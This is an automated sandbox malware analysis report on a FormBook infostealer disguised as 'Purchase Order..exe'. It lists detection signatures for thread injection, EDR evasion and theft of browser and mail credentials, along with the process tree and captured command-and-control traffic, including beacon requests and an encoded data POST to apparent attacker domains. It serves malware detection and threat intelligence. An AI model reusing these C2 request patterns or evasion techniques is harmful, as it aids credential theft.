Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order..exe

Overview

General Information

Sample name:Purchase Order..exe
Analysis ID:1567398
MD5:ecb3a0578fe97356ed12da57bc6bbc36
SHA1:6dff87fc845846f7ea2a03d0b5eff42b8fbc9f86
SHA256:469bf1df653a45070717d7c7121dfb3cdd3ccd150f3182ff399a012dc5c95de7
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Purchase Order..exe (PID: 1160 cmdline: "C:\Users\user\Desktop\Purchase Order..exe" MD5: ECB3A0578FE97356ED12DA57BC6BBC36)
    • Purchase Order..exe (PID: 3276 cmdline: "C:\Users\user\Desktop\Purchase Order..exe" MD5: ECB3A0578FE97356ED12DA57BC6BBC36)
      • jfBrBcvTIMPfDU.exe (PID: 5568 cmdline: "C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 5832 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • jfBrBcvTIMPfDU.exe (PID: 516 cmdline: "C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4936 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.Purchase Order..exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.Purchase Order..exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Purchase Order..exeReversingLabs: Detection: 55%
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.Purchase Order..exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Purchase Order..exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836855226.0000000003140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Purchase Order..exeJoe Sandbox ML: detected
                Source: Purchase Order..exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Purchase Order..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: Purchase Order..exe, 00000003.00000002.1835092143.0000000001278000.00000004.00000020.00020000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000002.2660645689.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: Purchase Order..exe, 00000003.00000002.1835092143.0000000001278000.00000004.00000020.00020000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000002.2660645689.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jfBrBcvTIMPfDU.exe, 00000005.00000000.1754034145.0000000000C1E000.00000002.00000001.01000000.0000000C.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000000.1907095632.0000000000C1E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Purchase Order..exe, 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1837480994.00000000046CE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1835190405.0000000004515000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Purchase Order..exe, Purchase Order..exe, 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1837480994.00000000046CE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1835190405.0000000004515000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0070C4E0 FindFirstFileW,FindNextFileW,FindClose,6_2_0070C4E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax6_2_006F9E40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then mov ebx, 00000004h6_2_046904F8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.cyperla.xyz
                Source: Joe Sandbox ViewIP Address: 188.114.96.6 188.114.96.6
                Source: Joe Sandbox ViewIP Address: 103.224.182.242 103.224.182.242
                Source: Joe Sandbox ViewASN Name: BETAINTERNATIONALTR BETAINTERNATIONALTR
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:27:04 GMTserver: Apacheset-cookie: __tad=1733232424.2662998; expires=Fri, 01-Dec-2034 13:27:04 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:27:07 GMTserver: Apacheset-cookie: __tad=1733232427.8390935; expires=Fri, 01-Dec-2034 13:27:07 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:27:10 GMTserver: Apacheset-cookie: __tad=1733232430.2077707; expires=Fri, 01-Dec-2034 13:27:10 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: GET /qygv/?MVWd=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WmoCRaQ8OoRB1M8xsODg9Mufe/exe8zzsMcFcs0FiYc3z1g==&kfm=dFj0Olb HTTP/1.1Host: www.cyperla.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvvTYRvxaqp7vn6p2LTuI6fSpdFMX3ZLUkPs/SWb4JECmGQ==&kfm=dFj0Olb HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olb HTTP/1.1Host: www.madhf.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /v89f/?MVWd=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2NYglVjUbXXrY07zMLLi7rmhcEJnvkrNOok7dcSq1J6Z3g==&kfm=dFj0Olb HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.cyperla.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cstrategy.online
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                Source: global trafficDNS traffic detected: DNS query: www.goldstarfootwear.shop
                Source: unknownHTTP traffic detected: POST /qx5d/ HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.cstrategy.onlineContent-Length: 205Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.cstrategy.online/qx5d/User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36Data Raw: 4d 56 57 64 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 78 64 31 62 75 6c 54 34 6b 37 44 56 4f 49 66 61 65 35 6a 50 48 7a 4d 77 72 6e 39 48 44 47 43 56 42 75 2b 44 35 62 70 4c 42 73 74 51 71 57 68 42 33 79 6c 68 46 4e 78 2f 49 62 6b 2f 55 44 39 38 47 73 64 52 6d 4f 76 70 4a 50 58 54 2b 46 52 70 35 69 74 6d 37 77 76 4f 46 79 46 2b 4b 2b 33 47 6a 5a 32 30 4c 6e 65 68 76 4d 6a 55 33 2f 78 44 6b 50 43 58 70 57 4d 4f 6c 30 41 75 39 49 51 45 77 61 74 64 51 79 47 65 74 52 30 4e 36 6e 63 64 46 4a 65 59 78 63 31 58 79 77 37 79 55 47 4a 4f 52 33 57 79 65 66 6b 62 6a 36 4b 66 77 73 6f 74 35 5a 49 65 75 68 70 2f 38 49 3d Data Ascii: MVWd=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYxc1Xyw7yUGJOR3Wyefkbj6Kfwsot5ZIeuhp/8I=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 13:26:31 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
